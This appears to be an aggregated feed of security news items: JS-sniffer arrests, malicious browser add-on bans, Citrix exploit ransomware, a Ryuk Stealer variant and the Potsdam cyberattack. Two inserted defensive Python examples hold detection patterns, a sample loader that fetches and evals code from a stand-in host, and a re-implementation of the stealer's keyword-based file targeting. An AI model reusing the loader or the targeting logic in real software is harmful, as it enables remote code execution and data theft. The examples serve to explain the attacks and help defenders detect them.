Group-IB has been tracking the GetBilling JS-sniffer family since 2018. The analysis of infrastructure that was controlled by the suspected operators of GetBilling arrested in Indonesia, carried out by Group-IB’s Cyber Investigations team, revealed that they have managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America, and some other countries. However, the investigation in other ASEAN countries continues, and the number of websites infected with GetBilling family is likely to be higher. According to the investigation, stolen payment data was used by the suspects to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price.

Fig. 1 Example of GetBilling’s malicious script

Fig. 2 Example of stolen payment and personal data stored on GetBilling’s servers

Group-IB’s Cyber Investigations team determined that some of GetBilling’s infrastructure was located in Indonesia. Upon discovery of this information, INTERPOL’s ASEAN Desk promptly notified the Indonesian cyber police. Further investigation showed that GetBilling’s operators were not new to the world of cybercrime. To reach the servers where stolen data was collected and from which their JS-sniffers were controlled, they always used a VPN to hide their real location and identity. To pay for hosting services and buy new domains, the gang members used only stolen cards. Despite that, the Indonesian cyber police, in cooperation with INTERPOL and Group-IB’s Cyber Investigations team, managed to establish that the group was operating from Indonesia.

“This case showed the nature of cybercrime — the operators of the JS-sniffer lived in one country attacking websites all around the world. It makes evidence collection, identification of suspects, and prosecution more complicated. Another thing that the case demonstrated vividly is that international cooperation and cyber intelligence data exchange can help effectively tackle modern cyber threats. Thanks to Indonesian Cyber Police and INTERPOL’s prompt actions, Night Fury became the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the APAC region. It is a great example of coordinated cross-border anti-cybercrime effort, and we are proud that our threat intelligence and digital forensics expertise helped to establish the suspects. We hope this will set a precedent for law enforcement in other jurisdictions too.”

Vesta Matveeva

Head of Group-IB’s APAC Cyber Investigations Team

By leveraging its own infrastructure for monitoring underground forums and card shops, Group-IB has collected comprehensive information about the carding market and is capable of identifying various anomalies. According to Group-IB’s annual 2019 threat report, the number of compromised cards uploaded to underground forums increased from 27.1 million to 43.8 million in H2 2018-H1 2019 year-on-year. The size of the carding market, in turn, grew by 33 percent to USD 879.7 million. The sale of CVV data is also on the rise, having increased by 19 percent in the same period, and one of the key reasons behind this trend could be JavaScript-sniffers.

The GetBilling family was first described in Group-IB’s 2019 report «Crime without punishment», a deep dive into the world of JS‑sniffers. According to the author of the report, Viktor Okorokov, threat intelligence analyst at Group-IB, at the time of the report’s publication the Group-IB Threat Intelligence team had discovered 38 families of JS-sniffers in total. Since then, the number of JS-sniffer families discovered by the company has almost doubled and continues to grow. JS‑sniffers have caused many security incidents in the past — the infection of the British Airways website and mobile app, the payment-card attack on the UK website of the international company FILA, etc. — and continue to gain popularity among cybercriminals. Most recently, in December 2019, JS-sniffers hit the APAC region, infecting the websites of the Singaporean fashion brand «Love, Bonito».

To avoid big financial losses due to JS-sniffers, online users are advised to have a separate pre-paid card for online payments, set spending limits on cards used for online shopping, or even use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.

About the author Group-IB:

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. Group-IB is a partner of INTERPOL, Europol, and has been recommended by the OSCE as a cybersecurity solutions provider. Group-IB is a member of the World Economic Forum.   

Pierluigi Paganini

(SecurityAffairs – Operation Night Fury, hacking)

The post Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world appeared first on Security Affairs.

Chrome and Firefox Clamp Down on Suspicious Behavior

Both Chrome and Firefox administrators have had to take action recently to halt the spread of malware via extensions and add-ons.

Google developer advocate Simeon Vincent explained over the weekend that the Chrome Web Store team detected an increase in fraudulent activity earlier in the month attempting to exploit users of the popular browser.

“Due to the scale of this abuse, we have temporarily disabled publishing paid items. This is a temporary measure meant to stem this influx as we look for long-term solutions to address the broader pattern of abuse,” he continued.

“If you have paid extensions, subscriptions, or in-app purchases and have received a rejection for ‘Spam and Placement in the Store’ this month, this is most likely the cause.”

Extension developers will not be allowed to update their offerings while these temporary measures last. Those who want to publish an item that has been rejected are urged to reply to the rejection email and request an appeal.

“You may be asked to republish your item, at which point the review should proceed normally. You must repeat this process for each new version while this measure is in place,” said Vincent.

Unfortunately for developers, there’s no immediate end in sight for these temporary measures.

“We are working to resolve this as quickly as possible, but we do not have a resolution timeline at the moment. Apologies for the inconvenience,” concluded Vincent.

The news comes as rival browser Firefox deals with its own add-on problems. Mozilla administrators have begun removing scores of dodgy add-ons from the Mozilla Add-on (AMO) portal and disabling any found in existing browser deployments.

Many of those marked for attention are thought to have been executing code from remote servers, installing malware, deliberately hiding code or eavesdropping on user searches.

Over 120 of the banned add-ons appear to have been published by a single developer, 2Ring, and were removed for executing remote code, which Mozilla’s add-on policies prohibit.

Citrix Flaw Exploited by Ransomware Attackers

Reports have emerged of multiple attempts to exploit a Citrix vulnerability, delivering ransomware to enterprise victims including a German car manufacturer.

Citrix began shipping patches for CVE-2019-19781 in its Application Delivery Controller (ADC) and Citrix Gateway products last week. If successfully exploited, the bug allows an unauthenticated attacker to execute arbitrary code.

At the time, FireEye warned that attackers were exploiting the flaw to deploy a backdoor, named “NotRobin,” in order to maintain access to exposed systems.

In an update, the security vendor claimed on Friday that it had detected efforts to deploy coin miners and ransomware via exploits for the vulnerability.

It traced attacks on dozens of FireEye customers back to ransomware named “Ragnarok,” which appears to have been created in mid-January. The ransom note demands 1 Bitcoin (about $8,600) to decrypt one infected machine or five Bitcoin ($43,002) for all of them.

“FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization,” it concluded.

“Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.”

As FireEye mentioned, there appear to be multiple groups looking to exploit the Citrix flaw in ransomware attacks.

Researchers took to Twitter to reveal efforts by attackers using the Sodinokibi variant, also known as REvil. Victims include German car parts manufacturer Gedia Automotive Group.

“I examined the files #REvil posted from Gedia after they refused to pay the #ransomware. The interesting thing I discovered is that they obviously hacked Gedia via the #Citrix exploit,” explained @underthebreach. “My bet is that all recent targets were accessed via this exploit.”

The news comes after white hats pointed to a critical unpatched flaw in Pulse Secure VPN products as being behind the Travelex ransomware outage.

Mozilla banned hundreds of malicious Firefox add-ons over the last weeks

Mozilla is stepping up its efforts to protect users: in the last couple of weeks its security staff has banned nearly 200 malicious Firefox add-ons.

Over the past two weeks, Mozilla has reviewed and banned 197 Firefox add-ons for executing malicious code. The add-ons were found stealing user data, and for this reason they were removed from the Mozilla Add-on (AMO) portal.

Mozilla also disabled the malicious add-ons in the browsers of the users who have already installed them.

The add-ons used obfuscation to hide their source code and were downloading and executing code from a remote server, behaviour that violates the portal’s policies. Downloading code from a remote server lets a threat actor run arbitrary code within the browser: whatever the server under their control serves is executed once it has been dynamically loaded, so the code reviewers saw at submission time says nothing about what the add-on does later.

Mozilla banned 14 Firefox add-ons ([1], [2], [3]) because they were using obfuscated code and potentially hiding malicious code.
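The two behaviours behind most of these bans, loading code from a remote server and executing it, and obfuscating the shipped source, can be triaged with a static scan of an unpacked add-on, and the same check applies to the remote-code removals described in the Chrome and Firefox item above. The following is an added example, not Mozilla’s or Google’s review tooling: the indicator patterns are common tells rather than a complete policy check, and the sample add-on files (updates.example, cdn.example) are constructed.

```python
"""Heuristic triage of an unpacked browser add-on for remote code loading,
dynamic code execution and obfuscation.

Added example, not Mozilla's or Google's review tooling. The indicator patterns are
common tells rather than a complete policy check; the sample add-on files are constructed.
"""
import re

# Code that pulls content from the network at run time.
REMOTE_LOAD = [
    re.compile(r"\bfetch\s*\(\s*['\"]https?://"),
    re.compile(r"\bXMLHttpRequest\b"),
    re.compile(r"\bimportScripts\s*\(\s*['\"]https?://"),
    re.compile(r"\.src\s*=\s*['\"]https?://"),             # injected <script src=...>
]
# Code that turns a string into executable code.
DYNAMIC_EXEC = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bnew\s+Function\s*\("),
    re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"]"),  # string argument, not a function
]
# Obfuscation indicators.
OBFUSCATION = [
    re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),               # long run of hex escapes
    re.compile(r"\batob\s*\(\s*['\"][A-Za-z0-9+/=]{40,}"),  # decoding a long embedded base64 blob
    re.compile(r"\b_0x[0-9a-f]{4,}\b"),                     # javascript-obfuscator style names
]
HTML_REMOTE_SCRIPT = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]https?://", re.I)


def triage_file(name, content):
    """Return the set of indicator labels found in one file of the add-on."""
    labels = set()
    if name.endswith(".html") and HTML_REMOTE_SCRIPT.search(content):
        labels.add("remote_script_tag")
    if name.endswith(".js"):
        if any(p.search(content) for p in REMOTE_LOAD):
            labels.add("remote_load")
        if any(p.search(content) for p in DYNAMIC_EXEC):
            labels.add("dynamic_exec")
        if any(p.search(content) for p in OBFUSCATION):
            labels.add("obfuscation")
    return labels


def triage_addon(files):
    """files maps path -> text. Returns {path: (verdict, labels)} for files a reviewer must look at.

    A file that both loads from the network and executes strings is the remote-code pattern
    the add-on policies forbid; a remote <script src> in extension HTML is the same thing
    without the indirection. Obfuscation alone is flagged because reviewers need readable source.
    """
    report = {}
    for name, content in files.items():
        labels = triage_file(name, content)
        if not labels:
            continue
        if "remote_script_tag" in labels or {"remote_load", "dynamic_exec"} <= labels:
            verdict = "remote code execution"
        elif "obfuscation" in labels:
            verdict = "obfuscated code"
        else:
            verdict = "needs review"
        report[name] = (verdict, sorted(labels))
    return report


# Constructed sample add-on: a loader that evals a fetched payload, an obfuscated popup
# script, a clean options script and a page that pulls a library straight from a CDN.
SAMPLE_ADDON = {
    "manifest.json": '{"manifest_version": 2, "name": "Sample"}',
    "background.js": (
        "fetch('https://updates.example/payload.js')\n"
        "  .then(r => r.text())\n"
        "  .then(code => eval(code));\n"
    ),
    "popup.js": (
        "var _0x3f2a = ['\\x73\\x65\\x61\\x72\\x63\\x68\\x74\\x65\\x72\\x6d\\x73'];\n"
        "console.log(_0x3f2a[0]);\n"
    ),
    "options.js": "document.getElementById('save').addEventListener('click', save);\n",
    "popup.html": '<html><script src="https://cdn.example/lib.js"></script></html>',
}

if __name__ == "__main__":
    for path, (verdict, labels) in triage_addon(SAMPLE_ADDON).items():
        print(f"{path}: {verdict} {labels}")
```

Labels are assigned per file, so a loader in one script that hands the fetched text to an eval in another is reported as two weaker findings rather than one strong one; treat the output as triage for a human reviewer, not as a verdict. A lone XMLHttpRequest is normal for an add-on talking to its own API, which is why it only escalates when the same file also executes strings.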

Most of the banned add-ons were developed by 2Ring, a provider of B2B software.

For the same reason, Mozilla banned six Firefox add-ons developed by Tamo Junto Caixa and three add-ons that were fake premium products.

Mozilla also banned an unnamed add-on, WeatherPool and Your Social, Pdfviewer – tools, RoliTrade, and Rolimons Plus for collecting user data without consent.

The organization also banned another 30 add-ons for malicious behavior.

Mozilla also reported the case of an add-on named Fake Youtube Downloader, which was spotted attempting to install malware in users’ browsers.

Mozilla also banned add-ons such as EasySearch for Firefox, EasyZipTab, ConvertToPDF, and FlixTab Search for intercepting and collecting user search terms, which likewise violates the rules.

Pierluigi Paganini

(SecurityAffairs – Mozilla, Firefox)

The post Mozilla banned hundreds of malicious Firefox add-ons over the last weeks appeared first on Security Affairs.

A new piece of Ryuk Stealer targets government, military and finance sectors

A new version of the Ryuk Stealer malware has been enhanced to steal confidential files related to the military, government, financial statements, and banking.

Security experts from MalwareHunterTeam have discovered a new version of the Ryuk Stealer malware, enhanced to let its operators steal a wider range of confidential files related to the military, government, financial statements, and banking.

In September 2019, BleepingComputer reported the discovery of a new piece of malware that included references to the Ryuk Ransomware and that was used to steal files whose names matched certain keywords.

It is not clear if the malware was developed by the threat actors behind Ryuk Ransomware for data exfiltration.

“It is likely the same actor with the access to the earlier Ryuk version who repurposed the code portion for this stealer,” explained the popular malware researcher Vitali Kremez.

“What we do know is that the malware is targeting very specific keywords that could be disastrous for governments, military operations, and law enforcement cases if the stolen files are exposed.” reported BleepingComputer.

The new variant of the Ryuk Stealer implements a new file-content scanning feature and is able to search for additional keywords in filenames when choosing files to exfiltrate.

(Image source: BleepingComputer)

The recently discovered variant of the Ryuk Stealer looks for C++ source files (.cpp), additional Word and Excel document types, PDFs, JPG images, and files associated with cryptocurrency wallets.

The scanning module first checks whether a file has one of the above extensions, then checks the file’s contents for one of the following keywords:

'personal', 'securityN-CSR10-SBEDGAR', 'spy', 'radar', 'agent', 'newswire', 'marketwired', '10-Q', 'fraud', 'hack', 'defence', 'treason', 'censored', 'bribery', 'contraband', 'operation', 'attack', 'military', 'tank', 'convict', 'scheme', 'tactical', 'Engeneering', 'explosive', 'drug', 'traitor', 'suspect', 'cyber', 'document', 'embeddedspy', 'radio', 'submarine', 'restricted', 'secret', 'balance', 'statement', 'checking', 'saving', 'routing', 'finance', 'agreement', 'SWIFT', 'IBAN', 'license', 'Compilation', 'report', 'secret', 'confident', 'hidden', 'clandestine', 'illegal', 'compromate', 'privacy', 'private', 'contract', 'concealed', 'backdoorundercover', 'clandestine', 'investigation', 'federal', 'bureau', 'government', 'security', 'unclassified', 'seed', 'personal', 'confident', 'mail', 'letter', 'passport', 'victim', 'court', 'NATO', 'Nato', 'scans', 'Emma', 'Liam', 'Olivia', 'Noah', 'William', 'Isabella', 'James', 'Sophia', 'Logan', 'Clearance'

In addition, the stealer checks filenames against a separate list of 55 keywords.

Once a document has passed the checks, it is uploaded to an FTP site; the researchers pointed out that the code of the Ryuk stealer includes two FTP sites, neither of which was reachable at the time of the analysis.
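The selection logic just described (extension check, then filename and content keywords, then upload) is simple enough to re-implement on the defender’s side, which lets an analyst inventory which files on a host would have satisfied the stealer’s checks and so gauge what an infection could have taken. The following is an added example, not the malware’s code or BleepingComputer’s analysis. Its assumptions are labelled in the code: the .wallet extension standing in for “cryptocurrency wallet” files, case-sensitive matching (inferred from the list containing both 'NATO' and 'Nato'), unpacking Office files before scanning them, and the sample files. The article does not reproduce the 55 filename keywords, so that list is a parameter the caller supplies; the “invoice” value used in the demo is hypothetical.

```python
"""Defender-side re-implementation of the file-selection logic described for the Ryuk stealer.

Added example, not the malware's code. Assumptions: the wallet extension, case-sensitive
matching, unpacking Office files, and the constructed sample files. The stealer's 55 filename
keywords are not public in the article, so they are passed in by the caller.
"""
import io
import os
import zipfile
from pathlib import PurePath

# Extensions the article names (.cpp, Word, Excel, PDF, JPG) plus an assumed wallet extension.
TARGET_EXTENSIONS = {".cpp", ".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg", ".jpeg",
                     ".wallet"}   # .wallet is an assumption for "cryptocurrency wallet" files

# Subset of the content keywords quoted in the article, in the article's order.
CONTENT_KEYWORDS = [
    "personal", "spy", "radar", "agent", "10-Q", "fraud", "hack", "defence", "treason",
    "military", "tactical", "secret", "balance", "statement", "routing", "finance", "SWIFT",
    "IBAN", "report", "confident", "clandestine", "investigation", "government", "security",
    "passport", "NATO", "Nato", "Clearance",
]


def extract_text(path, content):
    """Best-effort text for keyword scanning. Office Open XML files are zip archives, so their
    text is only visible after unzipping: a raw byte scan of a .docx finds nothing and would
    understate exposure (the article does not say whether the stealer unpacks them; assumed here)."""
    if PurePath(path).suffix.lower() in {".docx", ".xlsx"}:
        try:
            with zipfile.ZipFile(io.BytesIO(content)) as zf:
                xml = b"".join(zf.read(n) for n in zf.namelist() if n.endswith(".xml"))
            return xml.decode("utf-8", errors="ignore")
        except zipfile.BadZipFile:
            return ""
    # PDFs and JPEGs carry compressed or binary data; only plain-text strings are seen here.
    return content.decode("utf-8", errors="ignore")


def selection_reason(path, content, filename_keywords=()):
    """Why the stealer's checks would select this file, or None if they would not.

    Extension check first, as the article describes. The filename list is checked before the
    content scan because it needs no file read (assumed ordering)."""
    name = PurePath(path).name
    if PurePath(name).suffix.lower() not in TARGET_EXTENSIONS:
        return None
    for kw in filename_keywords:
        if kw in name:
            return ("filename", kw)
    text = extract_text(path, content)
    for kw in CONTENT_KEYWORDS:
        if kw in text:                  # case-sensitive substring match (assumption)
            return ("content", kw)
    return None


def inventory(files, filename_keywords=()):
    """files maps path -> bytes. Returns {path: (check, keyword)} for every file that would be taken."""
    hits = {}
    for path, content in files.items():
        reason = selection_reason(path, content, filename_keywords)
        if reason:
            hits[path] = reason
    return hits


def inventory_directory(root, filename_keywords=(), max_bytes=50 * 1024 * 1024):
    """Walk a real directory tree and apply the same checks (skips files larger than max_bytes)."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            if PurePath(p).suffix.lower() in TARGET_EXTENSIONS and os.path.getsize(p) <= max_bytes:
                with open(p, "rb") as fh:
                    files[p] = fh.read()
    return inventory(files, filename_keywords)


def build_ooxml_sample(text):
    """Constructed sample: a minimal zip laid out like an Office document containing `text`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/sharedStrings.xml", f"<sst><si><t>{text}</t></si></sst>")
    return buf.getvalue()


# Constructed sample host contents.
SAMPLE_FILES = {
    "C:/Users/a/Documents/budget_2020.xlsx": build_ooxml_sample("quarterly balance and routing numbers"),
    "C:/Users/a/Documents/memo.pdf": b"%PDF-1.4 ... security Clearance required ...",
    "C:/Users/a/Documents/invoice_2019.pdf": b"%PDF-1.4 ... nothing of note ...",
    "C:/Users/a/Documents/brief.pdf": b"%PDF-1.4 ... nato liaison ...",   # lowercase: not matched
    "C:/Users/a/Documents/notes.txt": b"NATO exercise schedule",         # extension not targeted
    "C:/Users/a/Pictures/holiday.jpg": b"\xff\xd8\xff\xe0 binary",
    "C:/src/main.cpp": b"int main() { return 0; }",
}

if __name__ == "__main__":
    # "invoice" stands in for the undisclosed filename keyword list (hypothetical).
    for path, reason in inventory(SAMPLE_FILES, filename_keywords=("invoice",)).items():
        print(path, reason)
```

Two things the run shows that the keyword list alone does not: a .txt file full of matching words is never considered because the extension gate comes first, and "nato" in lower case slips past a case-sensitive match. Both are useful when deciding which shares and user profiles to check first after an incident.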

The keywords targeted by the new variant of the Ryuk stealer show that the attackers are after confidential information in the military, banking, finance and law enforcement sectors.

Another aspect to consider is that ransomware operators are also interested in stealing sensitive data from their victims and using it to blackmail them into paying the ransom, as the Maze ransomware gang does.

Pierluigi Paganini

(SecurityAffairs – Ryuk stealer, hacking)

The post A new piece of Ryuk Stealer targets government, military and finance sectors appeared first on Security Affairs.

Recommendations for navigating the dynamic cybercrime landscape

In this interview, Mark Sangster, VP & Industry Security Strategist at eSentire, talks about the most pressing issues CISOs are dealing with in today’s fast-paced threat environment. How has the cybersecurity threat landscape evolved in the past 5 years? What are some of the most notable threats eSentire is seeing that were not an issue in the past? The past five years have seen significant progress in both the recognition of cybercrime, but also … More

The post Recommendations for navigating the dynamic cybercrime landscape appeared first on Help Net Security.

You can upgrade Windows 7 for free! Why wouldn’t you?

“Doomsday is here! The sky is falling! Windows 7 is out of support and all hell will break loose!” – or, at least, that’s what some cybersecurity experts and press outlets want you to think. In this article, I will offer some advice to businesses of all sizes that may need to continue using Windows 7, while understanding the risk. This is my opinion and should be taken as advice only. Every company is different, … More

The post You can upgrade Windows 7 for free! Why wouldn’t you? appeared first on Help Net Security.

Patients believe stronger privacy protections are more important than easier health data access

Patients and consumers deserve better access to personalized, actionable health care information to empower them to make better, more informed decisions – but it should not drive up health care costs or compromise the privacy of their personal health data, according to a poll of patients and consumers from Morning Consult and America’s Health Insurance Plans (AHIP). Personal privacy outweighs increased transparency A strong majority (62%) of patients want their data and privacy protected more … More

The post Patients believe stronger privacy protections are more important than easier health data access appeared first on Help Net Security.

Top 10 policy trends to watch for globally in 2020

The 10 top trends that will drive the most significant technological upheavals this year have been identified by Access Partnership. “Shifts in tech policy will disrupt life for everyone. While some governments try to leverage the benefits of 5G, artificial intelligence, and IoT, others find reasons simply to confront Big Tech ranging from protectionism to climate urgency. “Techlash trends highlighted in our report lay bare the risks of regulatory overreach: stymied innovation and economic growth … More

The post Top 10 policy trends to watch for globally in 2020 appeared first on Help Net Security.

Who Are the Digital Service Providers (DSP) under the NIS Directive?

In a previous article, we discussed what the NIS Directive is. The European Union developed the Directive in response to the emerging cyber threats to critical infrastructure and the impact cyber-attacks have on society and the European digital market. The NIS Directive sets three primary objectives: to improve the national information security capabilities of the […]… Read More

The post Who Are the Digital Service Providers (DSP) under the NIS Directive? appeared first on The State of Security.

Grandstream launches two new additions to its GWN series of Wi-Fi Access Points

Grandstream, connecting the world since 2002 with award-winning unified communication solutions, announced the release of the two newest additions to their GWN series of Wi-Fi Access Points. The new GWN7602 is a 2×2 802.11ac Wi-Fi AP with an integrated Ethernet switch that supports 100-meter wireless coverage range and up to 80 concurrent Wi-Fi clients. Additionally, Grandstream released the GWN7630LR, a new outdoor long-range 4×4 802.11ac Wi-Fi AP that supports 300-meter coverage range, 200+ concurrent clients, … More

The post Grandstream launches two new additions to its GWN series of Wi-Fi Access Points appeared first on Help Net Security.

Swimlane version 10.0: Reducing mean time to detect and response for security incidents

Swimlane, an independent leader in security orchestration, automation and response (SOAR), announced the release of Swimlane version 10.0. The newest release has yielded up to 35X performance improvement in alarm ingestion rates and up to a 60X improvement in search query response and display rates. Both achievements set new benchmarks for SOAR platforms, significantly reducing mean time to detect (MTTD) and respond (MTTR) for security incidents. “Today’s Security Operations Centers (SOC) are understaffed, overworked and … More

The post Swimlane version 10.0: Reducing mean time to detect and response for security incidents appeared first on Help Net Security.

Fugue’s engineer empowerment and education as growth strategy in 2020

Fugue, the company empowering engineers to build and operate secure cloud systems, cites product innovation, growing awareness of cloud misconfiguration risk, and the engineer-led movement to address cloud security with engineering solutions as its primary drivers for growth in 2019. In the past year, the company introduced several innovations to its award-winning cloud security product, gained significant new customers, and contributed two new open source projects for cloud infrastructure policy as code tooling. Engineer empowerment … More

The post Fugue’s engineer empowerment and education as growth strategy in 2020 appeared first on Help Net Security.

Adaptiva expands executive team in preparation for upcoming product launches

Adaptiva, a leading, global provider of endpoint management and security solutions for enterprise customers, announced strong financial results for 2019 along with significant expansion of its executive team in preparation for upcoming product launches and rapid growth in 2020, multiple award wins, and impressive scores in customer satisfaction metrics. Adaptiva’s customer growth and profitability continued to accelerate, and the company continued to see very strong growth of recurring license revenue in 2019. Business associated with … More

The post Adaptiva expands executive team in preparation for upcoming product launches appeared first on Help Net Security.

CloudKnox Security raises $12M to accelerate customer growth and innovation

CloudKnox Security, a leader in identity authorization for hybrid and multi-cloud environments, announced that it closed $12M in a new round of funding. Led by Sorenson Ventures with participation from early investors, including ClearSky Security, Dell Technologies Capital and Foundation Capital, the round brings CloudKnox’s total funding to $22.75M. The investment will be used to further accelerate the company’s product and go-to-market plans. CloudKnox also announced several key additions to the company’s board and executive … More

The post CloudKnox Security raises $12M to accelerate customer growth and innovation appeared first on Help Net Security.

White Ops appoints Dr. Russell Handorf to Principal Threat Intelligence Hacker

White Ops, the global leader in bot mitigation, verifying the humanity of more than 1 trillion digital interactions per week, announced the appointment of Dr. Russell Handorf, former Computer Scientist with the FBI, to Principal Threat Intelligence Hacker. In his new role, Dr. Handorf will lead investigations and operations into dark corners of the open, deep, and dark net to uncover and detail the workings of cybercriminals in an effort to protect White Ops customers—and … More

The post White Ops appoints Dr. Russell Handorf to Principal Threat Intelligence Hacker appeared first on Help Net Security.

City of Potsdam offline following a cyberattack

The City of Potsdam suffered a major cyberattack that took down its servers earlier this week, but emergency services were not impacted.

The German city of Potsdam has suffered a major cyberattack that took down its servers earlier this week; the good news is that emergency services, including the city’s fire department, remained fully operational and payment systems were not affected.

Potsdam is the capital and largest city of the German federal state of Brandenburg. It directly borders the German capital, Berlin, and is part of the Berlin/Brandenburg Metropolitan Region.

The intrusion into the Potsdam administration’s servers was discovered on Tuesday, and on Wednesday evening systems were disconnected from the Internet to contain the infection and prevent data exfiltration.

“The state capital Potsdam has switched off the administration’s internet connection and is therefore no longer accessible by email.” reads the advisory published by the City of Potsdam.

“We put our systems offline for security reasons, because we have to assume an illegal cyber attack,” said Mayor Mike Schubert. “We are working flat out to ensure that the affected administration systems are switched on again as soon as possible and that we can work safely again. In the meantime, we ask for your patience in all matters relating to the citizen service facilities.”

The IT staff noticed “numerous inconsistencies” in the city administration’s central access systems: a system belonging to an external provider was attempting, from outside and without authorization, to retrieve data from the state capital or to install malware.

The City of Potsdam hired external IT security companies and IT forensic experts to investigate the attack.

The state capital has filed criminal charges against persons unknown and reported the incident to the regional offices responsible for IT security and data protection.

The city published an update announcing that Potsdam’s administration is not able to receive emails from outside and that incoming emails will not be forwarded either.

Citizens can contact the city by calling the Potsdam administration staff or by submitting their applications in writing by post.

“After switching off the Internet connection of the state capital Potsdam, the citizen service of the state capital Potsdam is currently only of limited use,” reads the update. “The administration can currently not receive emails from outside and incoming emails are also not forwarded. For this reason, it is necessary for citizens to submit all applications in writing to the administration by post. The employees are still available by phone for questions.”

The City of Potsdam did not provide details on the attack, but German journalist Hanno Böck reported that Citrix ADC servers on the administration’s network are affected by the CVE-2019-19781 vulnerability.

Citrix has begun releasing fixes for CVE-2019-19781 in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

Pierluigi Paganini

(SecurityAffairs – Potsdam, hacking)

The post City of Potsdam offline following a cyberattack appeared first on Security Affairs.